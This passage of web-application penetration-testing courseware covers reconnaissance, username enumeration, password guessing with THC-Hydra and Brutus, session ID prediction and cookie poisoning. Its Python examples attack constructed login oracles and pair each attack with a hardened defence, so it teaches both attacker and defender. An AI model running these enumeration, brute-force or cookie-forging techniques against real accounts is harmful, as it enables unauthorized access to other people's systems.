- Examine the URL, HTTP headers, query string parameters, POST data, and cookies to determine all user input fields.
- Identify HTTP header parameters that can be processed by the application as user input, such as the User-Agent, Referer, Accept, Accept-Language, and Host headers.
- Determine URL encoding techniques and other encryption measures implemented to secure the web traffic, such as SSL.
The tools used to analyze web applications and identify entry points for user input include Burp Suite, httprint, WebScarab, OWASP Zed Attack Proxy, etc.
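The inventory described above can be automated over a request captured by an intercepting proxy. The following added example (not EC-Council code) parses one raw HTTP/1.1 request and lists every user-controlled entry point by location: path, query string, the headers the slide names, each cookie, and the form body. The request text, host and values are constructed.

```python
"""Enumerate user-controlled entry points in a captured HTTP request.

Added example, not EC-Council courseware. It assumes the request was saved
as text from an intercepting proxy; the request below is constructed and
uses the module's example host juggyboy.com.
"""
from urllib.parse import urlsplit, parse_qsl

# Headers the slide names as application-processed input (Cookie is handled
# separately so that each cookie becomes its own entry point).
INPUT_HEADERS = {"host", "user-agent", "referer", "accept", "accept-language"}


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, target, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def entry_points(raw):
    """Return every place the client can supply data, grouped by location."""
    method, target, headers, body = parse_request(raw)
    url = urlsplit(target)
    points = {
        "path": url.path,
        "query": dict(parse_qsl(url.query, keep_blank_values=True)),
        "headers": {n: v for n, v in headers.items() if n in INPUT_HEADERS},
        "cookies": {},
        "body": {},
    }
    for item in headers.get("cookie", "").split(";"):
        name, _, value = item.strip().partition("=")
        if name:
            points["cookies"][name] = value
    ctype = headers.get("content-type", "")
    if body and ctype.startswith("application/x-www-form-urlencoded"):
        points["body"] = dict(parse_qsl(body, keep_blank_values=True))
    elif body:
        # JSON, XML or multipart bodies are still input; keep them whole
        points["body"] = {"<raw body>": body}
    return points


def flatten(points):
    """Flatten to (location, name, value) tuples, one per entry point."""
    flat = [("path", "", points["path"])]
    for location in ("query", "headers", "cookies", "body"):
        flat += [(location, n, v) for n, v in points[location].items()]
    return flat


# Constructed request: a search form submission on the module's example site.
SAMPLE_REQUEST = (
    "POST /customers.aspx?name=existing%20clients&isActive=0&showBy=name HTTP/1.1\r\n"
    "Host: www.juggyboy.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Referer: https://www.juggyboy.com/index.aspx\r\n"
    "Accept: text/html\r\n"
    "Accept-Language: en-US\r\n"
    "Cookie: ASP.NET_SessionId=abc123; theme=dark\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 26\r\n"
    "\r\n"
    "account=1001&action=export"
)

if __name__ == "__main__":
    for location, name, value in flatten(entry_points(SAMPLE_REQUEST)):
        print(f"{location:8} {name:18} {value}")
```

Every tuple the script prints is a field the application must validate; from the defender's side the same list doubles as the checklist of inputs that need server-side validation and output encoding.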
• 127. Analyze Web Applications: Identify Server-Side Technologies
- Perform detailed server fingerprinting; analyze HTTP headers and HTML source code to identify server-side technologies
- Examine URLs for file extensions, directories, and other identification information
- Examine the error page messages
- Examine session tokens: JSESSIONID - Java; ASPSESSIONID - IIS server; ASP.NET_SessionId - ASP.NET; PHPSESSID - PHP
Example error page (http://juggyboy.com/error.aspx): "Server Error in '/ReportServer' Application. Could not find the permission set named 'ASP.Net'. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. Version Information: Microsoft .NET Framework Version 4.0.30319; ASP.NET Version 4.0.30319.1"
Example Server banners: Microsoft-IIS/6.0, SunONE WebServer 6.0, Netscape-Enterprise/4.1, Apache/2.0.52 (Fedora), Microsoft-IIS/6.0.0

Analyze Web Applications: Identify Server-Side Technologies
Source: http://net-square.com
After identifying the entry points through user inputs, attackers try to identify the server-side technologies. The server-side technologies can be identified as follows:
1. Perform detailed server fingerprinting; analyze HTTP headers and HTML source code to identify server-side technologies
2. Examine URLs for file extensions, directories, and other identification information
3. Examine the error page messages
4. Examine session tokens:
- JSESSIONID - Java
- ASPSESSIONID - IIS server
- ASP.NET_SessionId - ASP.NET
- PHPSESSID - PHP
• 128. [Screenshot: the ASP.NET error page above, and a web server fingerprinting report with the columns host, port, banner reported and banner deduced; for several hosts the reported banner (one reads "Yes we are using ServerMask!") differs from the deduced server]
FIGURE 13.37: Identify Server-Side Technologies
• 129. Analyze Web Applications: Identify Server-Side Functionality
Examine page source and URLs and make an educated guess to determine the internal structure and functionality of web applications.
Tools used: GNU Wget (http://www.gnu.org), Teleport Pro (http://www.tenmax.com), BlackWidow (http://softbytelabs.com)
Example URL: https://www.juggyboy.com/customers.aspx?name=existing%20clients&isActive=0&startDate=20%2F11%2F2010&endDate=20%2F05%2F2011&showBy=name
- https: SSL
- .aspx: ASPX platform
- showBy: database column

Analyze Web Applications: Identify Server-Side Functionality
Once the server-side technologies are determined, identify the server-side functionality. This helps you find potential vulnerabilities in the server-side functionality. Examine page source and URLs and make an educated guess to determine the internal structure and functionality of web applications.

Tools Used:

Wget
Source: http://www.gnu.org
GNU Wget retrieves files using HTTP, HTTPS, and FTP, the most widely used Internet protocols. It is a non-interactive command-line tool, so it can be called from scripts, cron jobs, terminals without X Window support, etc.

Teleport Pro
Source: http://www.tenmax.com
Teleport Pro is an all-purpose high-speed tool for getting data from the Internet. Launch up to ten simultaneous retrieval threads, access password-protected sites, filter files by size and type, and search for keywords. Capable of reading HTML 4.0, CSS 2.0, and DHTML, Teleport can find all files available on all websites by means of web spidering with server-side image map exploration, automatic dial-up connecting, Java applet support, variable exploration depths, project scheduling, and relinking abilities.

• 130. BlackWidow
Source: http://softbytelabs.com
BlackWidow scans a site and creates a complete profile of the site's structure, files, external links, and even link errors. BlackWidow will download all file types, such as pictures and images, audio and MP3, videos, documents, ZIP, programs, CSS, Macromedia Flash, .pdf, PHP, CGI, and HTM, to MIME types from any website. It can download video and save it in many different video formats, such as YouTube, MySpace, Google, MKV, MPEG, AVI, DivX, XviD, MP4, 3GP, WMV, ASF, MOV, QT, VOB, etc. It can now be controlled programmatically using the built-in Script Interpreter.

FIGURE 13.38: BlackWidow

If a page URL starts with https instead of http, the page is served over SSL. If a page has an .aspx extension, chances are that the application is written using ASP.NET. If the query string has a parameter named showBy, you can assume that the application uses a database and displays the data by that value.
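The clues from the last three slides (URL scheme and extension, query parameter names, the Server banner, and session cookie names) can be combined into one inference routine. The following added example (not EC-Council code) does so and also applies a consistency check that mirrors the fingerprinting report in Figure 13.37, where the reported banner and the deduced server disagree. The cookie and extension tables follow the slides; the sample inputs and the "ASP implies IIS" rule are constructions of this example.

```python
"""Infer server-side technology from the clues on the preceding slides:
URL scheme and file extension, query parameter names, the Server header
and session cookie names.

Added example, not EC-Council courseware. The cookie/extension tables
follow the slides; the sample inputs are constructed and the banner
consistency rule is a heuristic of this example.
"""
import posixpath
from urllib.parse import urlsplit, parse_qsl

# Session cookie name -> platform (from the slide). ASPSESSIONID carries a
# random suffix on real IIS servers, so names are matched by prefix.
SESSION_COOKIES = {
    "jsessionid": "Java",
    "aspsessionid": "Classic ASP (IIS)",
    "asp.net_sessionid": "ASP.NET",
    "phpsessid": "PHP",
}
EXTENSIONS = {".aspx": "ASP.NET", ".asp": "Classic ASP (IIS)",
              ".jsp": "Java", ".php": "PHP", ".cfm": "ColdFusion"}
# Query names that typically select a column or sort clause in a database query.
DB_HINTS = {"showby", "sortby", "orderby", "sort", "order"}


def infer(url, server_header="", cookie_names=()):
    """Return what an observer can deduce from one response."""
    parts = urlsplit(url)
    ext = posixpath.splitext(parts.path)[1].lower()
    platforms = set()
    if ext in EXTENSIONS:
        platforms.add(EXTENSIONS[ext])
    for name in cookie_names:
        lname = name.lower()
        for prefix, platform in SESSION_COOKIES.items():
            if lname.startswith(prefix):
                platforms.add(platform)
    return {
        "tls": parts.scheme == "https",
        "extension": ext,
        "platforms": platforms,
        "server_banner": server_header.strip(),
        "db_hints": [n for n, _ in parse_qsl(parts.query) if n.lower() in DB_HINTS],
    }


def banner_consistency(result):
    """Heuristic: ASP.NET and Classic ASP run on IIS, so a non-IIS banner
    beside an ASP platform suggests a masked banner or a reverse proxy.
    Returns 'consistent', 'suspicious' or 'unknown' (rule does not apply)."""
    asp = {"ASP.NET", "Classic ASP (IIS)"} & result["platforms"]
    banner = result["server_banner"].lower()
    if not asp or not banner:
        return "unknown"
    return "consistent" if "iis" in banner else "suspicious"


# Constructed samples: the slide's example URL, and a masked-banner case.
SAMPLE_URL = ("https://www.juggyboy.com/customers.aspx?name=existing%20clients"
              "&isActive=0&startDate=20%2F11%2F2010&endDate=20%2F05%2F2011&showBy=name")
SAMPLE_PLAIN = infer(SAMPLE_URL, "Microsoft-IIS/6.0", ["ASP.NET_SessionId"])
SAMPLE_MASKED = infer("http://www.juggyboy.com/login.asp", "Apache/2.0.x",
                      ["ASPSESSIONIDQSRRQSBD"])

if __name__ == "__main__":
    for r in (SAMPLE_PLAIN, SAMPLE_MASKED):
        print(r, banner_consistency(r))
```

Run against your own servers, a "suspicious" result shows that banner masking alone leaks the platform through cookie names and extensions; renaming the session cookie and hiding extensions closes those channels, the banner does not.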
• 131. Analyze Web Applications: Map the Attack Surface
Information -> Attack
- Client-Side Validation -> Injection Attack, Authentication Attack
- Injection Attack -> Privilege Escalation, Access Controls
- Database Interaction -> SQL Injection, Data Leakage
- Cleartext Communication -> Data Theft, Session Hijacking
- File Upload and Download -> Directory Traversal
- Error Message -> Information Leakage
- Display of User-Supplied Data -> Cross-Site Scripting
- Email Interaction -> Email Injection
- Dynamic Redirects -> Redirection, Header Injection
- Application Codes -> Buffer Overflows
- Login -> Username Enumeration, Password Brute-Force
- Third-Party Application -> Known Vulnerabilities Exploitation
- Session State -> Session Hijacking, Session Fixation
- Web Server Software -> Known Vulnerabilities Exploitation

Analyze Web Applications: Map the Attack Surface
There are various entry points through which attackers can compromise the network, so a proper analysis of the attack surface must be done. Mapping the attack surface includes thorough checking of the possible vulnerabilities for launching an attack. The table above lists the various factors through which an attacker collects information and plans the kind of attack to be launched.
• 132. FIGURE 13.39: Map the Attack Surface (the Information/Attack table above)
• 133. Web App Hacking Methodology: Attack Authentication Mechanism
In web applications, the authentication functionality has many design loopholes, such as bad passwords (short or blank, common dictionary words or names, passwords set the same as the user name, and those still set to default values). The attacker can exploit vulnerabilities in the authentication mechanism to gain access to the web application or network. The various threats that exploit weaknesses in the authentication mechanism include network eavesdropping, brute-force attacks, dictionary attacks, cookie replay attacks, credential theft, etc.
• 134. Attack Authentication Mechanism

Most authentication mechanisms used by web applications have design flaws. An attacker who identifies those flaws can exploit them to gain unauthorized access. Typical flaws include failing to enforce password strength and transporting credentials over the Internet without encryption. Web applications usually authenticate their users with a combination of user name and password, so attacking the authentication mechanism comes down to identifying valid user names and then recovering the matching passwords.

User Name Enumeration

User names can be enumerated in two ways: from verbose failure messages and from predictable user names.

Verbose Failure Message

In a typical login system the user enters two pieces of information, a user name and a password; some applications ask for more. When a login attempt fails, at least one of the supplied pieces of information is incorrect or inconsistent with the others. If the application discloses which piece was wrong, it lets the attacker confirm valid user names independently of the password, which is the foothold for the password attacks that follow.
• 135. Examples of verbose failure messages:
- Account <username> not found
- The password provided is incorrect
- Account <username> has been locked out

Predictable User Names

Some applications generate account user names automatically according to a predictable sequence. An attacker who discerns the sequence can produce an exhaustive list of potentially valid user names without any guessing.

Password Attacks

Passwords are cracked by means of:
- Password functionality exploits
- Password guessing
- Brute-force attacks

Session Attacks

The types of session attack used against the authentication mechanism are:
- Session prediction
- Session brute-forcing
- Session poisoning

Cookie Exploitation

The types of cookie exploitation attack are:
- Cookie poisoning
- Cookie sniffing
- Cookie replay
• 136. User Name Enumeration

If the login error states which part of the user name and password pair is incorrect, guess the users of the application by trial and error.

Note: user name enumeration from verbose error messages will fail if the application implements an account lockout policy, i.e. locks the account after a certain number of failed login attempts.

Source: https://wordpress.com

User name enumeration turns the guessing problem from "user name and password" into "password only": once a login ID is confirmed valid, every further attempt can be spent on the password. If the login error states which part of the user name and password pair is incorrect, guess the users of the application by trial and error. The following picture shows user names being enumerated from verbose failure messages:
• 137. FIGURE 13.40: User Name Enumeration (two WordPress.com login attempts)
- Login as "rinimatthews" with a wrong password: "ERROR: The password you entered for the email or username rinimatthews is incorrect."
- Login as "rini.matthews": "ERROR: Invalid email or username."
- Conclusion: the user name rini.matthews does not exist, while rinimatthews does. The user name has been successfully enumerated.

Note: user name enumeration from verbose error messages will fail if the application implements an account lockout policy, i.e. locks the account after a certain number of failed login attempts. Some applications generate account user names from a sequence (such as user101, user102, etc.); attackers can determine the sequence and enumerate valid user names without touching the login form at all.
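The enumeration shown in the figure, together with the generic response that defeats it, as an added example. This is not code from the CEH material or from WordPress: the user store, the two login handlers, the candidate list and the error strings (modelled on the screenshot text) are all constructed here. The enumeration routine works against any login function that returns a message, so it also applies to the "account locked out" variant.

```python
"""Username enumeration from verbose login errors, and the hardened response.

Constructed example: USERS, the handlers and CANDIDATES are invented here.
"""
import hashlib
import hmac
import secrets

_SALT = b"constructed-static-salt"   # one salt for brevity; real stores use one per user


def _hash(password: str) -> bytes:
    """Slow password hash (PBKDF2-HMAC-SHA256) so a guess costs the attacker time."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, 10_000)


# Constructed user store: user name -> password hash.
USERS = {
    "rinimatthews": _hash("correct horse"),
    "admin": _hash("S3cret!"),
}


def login_verbose(username: str, password: str) -> str:
    """Vulnerable: the message reveals whether the user name exists."""
    if username not in USERS:
        return "ERROR: Invalid email or username."
    if not hmac.compare_digest(USERS[username], _hash(password)):
        return f"ERROR: The password you entered for the username {username} is incorrect."
    return "OK"


def login_generic(username: str, password: str) -> str:
    """Hardened: one message, and the same amount of work, for both failure causes."""
    stored = USERS.get(username)
    candidate = _hash(password)          # always hash, so timing is identical too
    if stored is None or not hmac.compare_digest(stored, candidate):
        return "ERROR: Invalid username or password."
    return "OK"


def enumerate_users(login, candidates, probe_password="x"):
    """Trial and error: first learn what the application says for a name that
    certainly does not exist, then flag every candidate that gets a different
    answer. Works on any handler that returns a string."""
    baseline = login("no-such-user-" + secrets.token_hex(4), probe_password)
    return [u for u in candidates if login(u, probe_password) != baseline]


# Constructed candidate list, following the figure's two spellings.
CANDIDATES = ["rini.matthews", "rinimatthews", "admin", "jason"]

if __name__ == "__main__":
    print("verbose:", enumerate_users(login_verbose, CANDIDATES))   # two names confirmed
    print("generic:", enumerate_users(login_generic, CANDIDATES))   # nothing learned
```

Against `login_verbose` the attacker confirms both real accounts with one request each; against `login_generic` every candidate, real or not, produces the same string, and because the hash is computed on every path the response time does not leak the answer either.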
• 138. Password Attacks: Password Functionality Exploits

Password attacks are the techniques an attacker uses to discover passwords. Attackers exploit the application's password functionality itself (change, recovery and "remember me" features) in order to bypass the authentication mechanism.

Password Changing
- Determine the password change functionality within the application by spidering the application or by creating a login account.
- Try random strings for the 'Old Password', 'New Password' and 'Confirm the New Password' fields and analyze the errors to identify vulnerabilities in the password change functionality (for example, a change that succeeds without the correct old password, or an error that confirms the old password was right before the new ones are checked).

Password Recovery
- 'Forgot Password' features generally present a challenge to the user; if the number of attempts is not limited, an attacker can guess the challenge answer with the help of social engineering.
- Applications may also send a unique recovery URL or the existing password to an email address specified by the attacker once the challenge is solved.

Remember Me Exploit
- "Remember Me" functions are often implemented with a simple persistent cookie such as RememberUser=jason, or with a persistent session identifier such as RememberUser=ABY112010.

• 139. Attackers can use an enumerated user name, or predict the persistent session identifier, to forge such a cookie and bypass the authentication mechanism entirely.
• 140. Password Attacks: Password Guessing

Password guessing is a method where an attacker tries various passwords until the correct one is found, using a password list, a password dictionary, and automated tools.

Password List

Attackers create a list of possible passwords from the most commonly used passwords, from footprinting the target, and from social engineering techniques, and try each password until the correct one is discovered.

Password Dictionary

Attackers can create a dictionary of all plausible passwords using tools such as Dictionary Maker to perform dictionary attacks.

Tools Used for Password Guessing

Password guessing can be performed manually or with automated tools such as WebCracker, Brutus, Burp Intruder and THC-Hydra.

THC-Hydra

Source: http://www.thc.org

• 141. THC-Hydra is a network logon cracker that supports many different services. The tool is proof-of-concept code that gives researchers and security consultants a way to show how easy it would be to gain unauthorized remote access to a system.

FIGURE 13.41: THC-Hydra tool screenshot (Hydra GTK front end). The recoverable content of the screenshot is the command lines and the run log:

    hydra 127.0.0.1 ftp -l testuser -P /tmp/passlist.txt -e ns
    hydra 127.0.0.1 ftp -l marc -P /tmp/passlist.txt -e ns -t 32

    Hydra v4.1 (c) 2004 by van Hauser / THC - use allowed only for legal purposes.
    [DATA] 32 tasks, 1 servers, 45380 login tries (l:1/p:45380), ~1418 tries per task
    [DATA] attacking service ftp on port 21
    [STATUS] 14056.00 tries/min, 14056 tries in 00:01h, 31324 todo in 00:03h
    [STATUS] 14513.00 tries/min, 29026 tries in 00:02h, 16354 todo in 00:02h
    [21][ftp] host: 127.0.0.1 login: marc password: success
    Hydra finished at 2004-05-17 22:01:38

Here -l gives a single login name, -P the password list, -t the number of parallel tasks, and -e ns adds two cheap guesses before the list: an empty password (n) and the login name used as the password (s).
• 142. Password Attacks: Brute Forcing

Brute force is one of the methods used for cracking passwords. In a brute-force attack the attacker tries every possible value from a set of alphabetic, numeric and special characters until the login succeeds. The limitation of brute force is that it is only practical against short passwords: the number of candidates grows exponentially with the password length and with the size of the character set. A long password that mixes upper- and lower-case letters is already expensive to guess, and once digits and symbols are added exhausting the key space can take years, which makes the attack practically infeasible. Password cracking tools commonly used by attackers include Burp Suite's Intruder, Brutus and SensePost's Crowbar.

Burp Suite's Intruder

Source: http://portswigger.net

Burp Intruder is a module of Burp Suite. It lets the user automate customized attacks against web applications during penetration testing.

• 143. FIGURE 13.42: Burp Suite's Intruder tool screenshot (Burp Suite free edition v1.4.01, Intruder payloads tab). Payload set 1 uses the "brute forcer" payload type with the character set abcdefghijklmnopqrstuvwxyz0123456789, and the tab reports 1,679,616 payloads (36 characters at a fixed length of 4, i.e. 36^4) and 8,398,080 requests; a "to uppercase" payload processing rule is configured.

Brutus

Source: http://www.hoobie.net

Brutus is a remote password cracking tool. It supports HTTP, POP3, FTP, SMB, Telnet, IMAP, NNTP and many other authentication types. It includes a multi-stage authentication engine and can make 60 simultaneous target connections.

FIGURE 13.43: Brutus tool screenshot (Brutus AET2, www.hoobie.net/brutus, January 2000). The screenshot shows type HTTP (Basic Auth) against target 127.0.0.1 on port 80 with 10 connections and a 10 second timeout, method HEAD with KeepAlive, pass mode "Word List" (words.txt) and user file users.txt. The log reads: "Opened user file containing 6 users. Opened password file containing 818 Passwords. Maximum number of authentication attempts will be 4908", and the positive authentication results list recovered user names such as admin, academic and backup for 127.0.0.1/.
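The guessing procedure described across the password list, dictionary, Hydra and brute-force slides, as one added example. It is not code from the CEH material, Hydra, Burp or Brutus: the login oracle, its lockout rule and the word list are constructed here. The candidate order copies what Hydra's -e ns switch does (empty password, then the login name as password) before the word list, and then falls back to an exhaustive walk of a character set so that the key-space growth the brute-force slide describes can be measured rather than asserted.

```python
"""Password guessing against a login oracle: cheap guesses, then a word list,
then brute force, with the account-lockout failure mode.

Constructed example: LoginOracle and WORDLIST are invented here.
"""
import itertools
from typing import Iterable, Iterator, Optional


def candidates(login: str, wordlist: Iterable[str],
               charset: str = "", max_len: int = 0) -> Iterator[str]:
    """Yield guesses in attacker order: the two cheap guesses Hydra's -e ns adds,
    the word list, then every string over `charset` up to `max_len`."""
    yield ""        # -e n: empty password
    yield login     # -e s: login name as the password
    for word in wordlist:
        yield word
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            yield "".join(combo)


def keyspace(charset_size: int, max_len: int) -> int:
    """Number of candidates of length 1..max_len over a charset of the given size."""
    return sum(charset_size ** n for n in range(1, max_len + 1))


def seconds_to_exhaust(charset_size: int, max_len: int, tries_per_min: float) -> float:
    """Worst-case time at a given guessing rate (the rate Hydra prints as tries/min)."""
    return keyspace(charset_size, max_len) / (tries_per_min / 60.0)


class LoginOracle:
    """Constructed target with one account and an optional lockout threshold."""

    def __init__(self, username: str, password: str, lockout_after: Optional[int] = None):
        self._user, self._pw = username, password
        self._lockout_after = lockout_after
        self.failures = 0
        self.attempts = 0

    def try_login(self, username: str, password: str) -> str:
        self.attempts += 1
        if self._lockout_after is not None and self.failures >= self._lockout_after:
            return "locked"           # lockout policy: further guesses are refused
        if username == self._user and password == self._pw:
            self.failures = 0
            return "ok"
        self.failures += 1
        return "fail"


def guess(oracle: LoginOracle, login: str, wordlist: Iterable[str],
          charset: str = "", max_len: int = 0) -> Optional[str]:
    """Drive the oracle with `candidates`; return the password, or None when the
    candidates run out or the account locks."""
    for pw in candidates(login, wordlist, charset, max_len):
        result = oracle.try_login(login, pw)
        if result == "ok":
            return pw
        if result == "locked":
            return None
    return None


# Constructed word list; "success" mirrors the password found in the Hydra figure.
WORDLIST = ["123456", "password", "letmein", "marc2004", "success"]

if __name__ == "__main__":
    print(guess(LoginOracle("marc", "success"), "marc", WORDLIST))            # success
    print(guess(LoginOracle("marc", "success", lockout_after=3), "marc", WORDLIST))  # None
    # Lower-case letters to length 4 vs. the full printable set to length 8, at the
    # ~14,000 tries/min shown in the Hydra screenshot.
    print(seconds_to_exhaust(26, 4, 14000) / 3600, "hours")
    print(seconds_to_exhaust(95, 8, 14000) / (3600 * 24 * 365), "years")
```

The same loop that recovers "marc"'s password from a five-word list in seven attempts gets nothing once the oracle locks after three failures, and the `seconds_to_exhaust` figures show why the brute-force fallback is only a threat to short passwords over small alphabets.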
• 144. Session Attacks: Session ID Prediction / Brute Forcing

Every time a user logs in to a website the application issues a session ID to the user. The session ID is valid until the session is terminated, and a new one is issued when the user logs in again. Attackers exploit the session ID mechanism by collecting some valid session IDs and then guessing the next one.

- In the first step, the attacker collects some valid session ID values by sniffing traffic from authenticated users.
- The attacker then analyzes the captured session IDs to determine how they are generated: the structure of the ID, the information used to create it, and the encryption or hash algorithm the application uses to protect it.
- In addition, the attacker can brute force the session ID, generating and testing different values until one grants access to the application.

• 145. Vulnerable session generation mechanisms that compose the session ID from the user name or from other predictable information, such as a timestamp or the client IP address, can be exploited by simply guessing valid session IDs.

FIGURE 13.44: Session ID Prediction / Brute Forcing (captured request)

    GET http://janaina:8180/WebGoat/attack?Screen=17&menu=410 HTTP/1.1
    Host: janaina:8180
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    Referer: http://janaina:8180/WebGoat/attack?Screen=17&menu=410
    Cookie: JSESSIONID=user01
    Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=

For many web applications the session ID is a string of fixed width. Randomness is essential to prevent prediction. In the request above the session variable is JSESSIONID and its value is "user01", which corresponds to the user name. By guessing the next value, say "user02", the attacker gains unauthorized access to another user's session.

Predictable Session Cookie
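The analysis step of the procedure above, as an added example that is not part of the CEH material or of WebGoat. Two token generators are constructed here: a weak one that reproduces the figure's JSESSIONID=user01 pattern (fixed prefix plus a counter) and a strong one that draws 128 bits from the operating system's CSPRNG. The analysis measures how much each character position varies across the captured sample and tries to predict the next identifier, which is exactly the question an attacker asks of sniffed session IDs.

```python
"""Analyzing captured session IDs for structure and predicting the next one.

Constructed example: the generators and the "captured" samples are invented here.
"""
import math
import re
import secrets
from collections import Counter
from typing import List, Optional


def weak_session_id(n: int) -> str:
    """Constructed weak scheme: constant prefix plus a zero-padded sequence number."""
    return f"user{n:02d}"


def strong_session_id() -> str:
    """128 random bits from os.urandom, hex encoded (32 characters)."""
    return secrets.token_hex(16)


def positional_entropy(tokens: List[str]) -> List[float]:
    """Shannon entropy, in bits, of each character position across the sample.
    Positions near 0 bits are constant (structure); a good token is near
    log2(alphabet size) everywhere."""
    width = min(len(t) for t in tokens)
    result = []
    for i in range(width):
        counts = Counter(t[i] for t in tokens)
        total = sum(counts.values())
        result.append(-sum(c / total * math.log2(c / total) for c in counts.values()))
    return result


def total_entropy_bits(tokens: List[str]) -> float:
    """Upper bound on the sample's randomness; an attacker brute forces 2^this."""
    return sum(positional_entropy(tokens))


def predict_next(tokens: List[str]) -> Optional[str]:
    """If every token is <constant non-digit prefix><fixed-width counter> with a
    constant step, return the next value in the sequence; otherwise None."""
    matches = [re.fullmatch(r"(\D*)(\d+)", t) for t in tokens]
    if len(tokens) < 2 or not all(matches):
        return None
    prefixes = {m.group(1) for m in matches}
    widths = {len(m.group(2)) for m in matches}
    if len(prefixes) != 1 or len(widths) != 1:
        return None
    nums = [int(m.group(2)) for m in matches]
    steps = {b - a for a, b in zip(nums, nums[1:])}
    if len(steps) != 1:
        return None
    step, width = steps.pop(), widths.pop()
    return f"{prefixes.pop()}{nums[-1] + step:0{width}d}"


# Constructed "sniffed" samples.
CAPTURED_WEAK = [weak_session_id(n) for n in range(1, 6)]     # user01 .. user05
CAPTURED_STRONG = [strong_session_id() for _ in range(200)]

if __name__ == "__main__":
    print(positional_entropy(CAPTURED_WEAK))      # five zeros, then ~2.3 bits
    print(predict_next(CAPTURED_WEAK))            # user06
    print(round(total_entropy_bits(CAPTURED_STRONG)), "bits;",
          predict_next(CAPTURED_STRONG))          # ~126 bits; None
```

Five captured weak IDs are enough to recover the generator and name the next session, while 200 strong IDs show roughly four bits of entropy at every position and no sequence to extend. In practice the first thing to try on a captured JSESSIONID is exactly this: decode it, look for constant positions, and check whether consecutive values differ by a constant.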
• 146. Cookie Exploitation: Cookie Poisoning

- If the cookie contains passwords or session identifiers, attackers can steal the cookie using techniques such as script injection and eavesdropping.
- Attackers then replay the cookie, with the same or altered passwords or session identifiers, to bypass web application authentication.
- Attackers can trap cookies using tools such as OWASP Zed Attack Proxy and Burp Suite.

Cookies frequently transmit sensitive credentials and can be modified with ease to escalate access or to assume the identity of another user. Cookies are used to maintain session state in the otherwise stateless HTTP protocol, and sessions are intended to be uniquely tied to the individual accessing the web application. Poisoning cookies and session information lets an attacker inject malicious content, alter the user's online experience and obtain unauthorized information.

Cookies can contain session-specific data such as user IDs, passwords, account numbers, links to shopping cart contents, supplied private information and session IDs. They exist as files stored in the client computer's memory or on its hard disk. By modifying the data in a cookie, an attacker can often gain escalated access or maliciously affect the user's session. Many sites offer a "Remember me?" option and store the user's information in a cookie so that it need not be re-entered on every visit; any private information entered is then stored in the cookie.

In an attempt to protect cookies, site developers often encode them. Easily reversible encodings such as Base64 and ROT13 (rotating the letters of the alphabet by 13 places) give many who view cookies a false sense of security: encoding is not encryption and provides no integrity protection. If the cookie contains passwords or session identifiers, attackers can steal it using techniques such as script injection and eavesdropping, and then replay it with the same or altered passwords or session identifiers to bypass web application authentication.

• 147. Examples of tools attackers use to trap cookies include OWASP Zed Attack Proxy and Burp Suite.

OWASP Zed Attack Proxy

Source: https://www.owasp.org

The OWASP Zed Attack Proxy Project (ZAP) is an integrated penetration testing tool for testing web applications. It provides automated scanners as well as a set of tools for finding security vulnerabilities manually.

FIGURE 13.45: OWASP Zed Attack Proxy tool screenshot. The intercepted request shown in the Request tab is a browser request to tr.adinterax.com (referred from in.yahoo.com) carrying a Cookie header with the adxid and adxf values, which the Break feature lets the tester edit before it is forwarded.
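The poisoning step, and the integrity protection that stops it, as one added example covering both the "Remember Me" cookie (RememberUser=jason) from the password-functionality slides and the Base64 "encoding as protection" point above. This is not code from the CEH material, ZAP or any web framework: the cookie layouts, the server key, the user data and the remember-me store are constructed here.

```python
"""Cookie poisoning of an encoded cookie, and an HMAC-signed, expiring alternative
with a random remember-me token instead of a user name.

Constructed example: every name, key and value here is invented.
"""
import base64
import hashlib
import hmac
import json
import secrets
import time
from typing import Optional

# --- Vulnerable: Base64 is encoding, not protection -----------------------------

def issue_encoded_cookie(user: str, role: str) -> str:
    return base64.b64encode(json.dumps({"user": user, "role": role}).encode()).decode()


def read_encoded_cookie(cookie: str) -> dict:
    """The server trusts whatever comes back from the client."""
    return json.loads(base64.b64decode(cookie))


def poison(cookie: str, **changes) -> str:
    """What an attacker does with a trapped cookie: decode, edit, re-encode, replay."""
    data = read_encoded_cookie(cookie)
    data.update(changes)
    return base64.b64encode(json.dumps(data).encode()).decode()


# --- Hardened: signed claims with an expiry ------------------------------------

SERVER_KEY = secrets.token_bytes(32)    # constructed; in production loaded from a secret store


def _sign(payload: bytes) -> str:
    return hmac.new(SERVER_KEY, payload, hashlib.sha256).hexdigest()


def issue_signed_cookie(user: str, role: str, ttl: int = 3600, now: Optional[int] = None) -> str:
    """<urlsafe-base64 JSON>.<hex HMAC>; the MAC covers the encoded payload."""
    exp = (now if now is not None else int(time.time())) + ttl
    payload = base64.urlsafe_b64encode(json.dumps({"user": user, "role": role, "exp": exp}).encode())
    return payload.decode() + "." + _sign(payload)


def read_signed_cookie(cookie: str, now: Optional[int] = None) -> Optional[dict]:
    """Return the claims only if the MAC verifies (constant-time) and it is unexpired.
    The payload is not even decoded until the signature checks out."""
    try:
        payload_b64, sig = cookie.rsplit(".", 1)
    except ValueError:
        return None
    payload = payload_b64.encode()
    if not hmac.compare_digest(_sign(payload), sig):
        return None
    data = json.loads(base64.urlsafe_b64decode(payload))
    if data["exp"] < (now if now is not None else int(time.time())):
        return None
    return data


# --- Remember-me: a random token looked up server-side, never the user name ------

REMEMBER_STORE: dict = {}   # sha256(token) -> user; only the hash is stored


def issue_remember_token(user: str) -> str:
    token = secrets.token_urlsafe(32)
    REMEMBER_STORE[hashlib.sha256(token.encode()).hexdigest()] = user
    return token


def resolve_remember_token(token: str) -> Optional[str]:
    return REMEMBER_STORE.get(hashlib.sha256(token.encode()).hexdigest())


if __name__ == "__main__":
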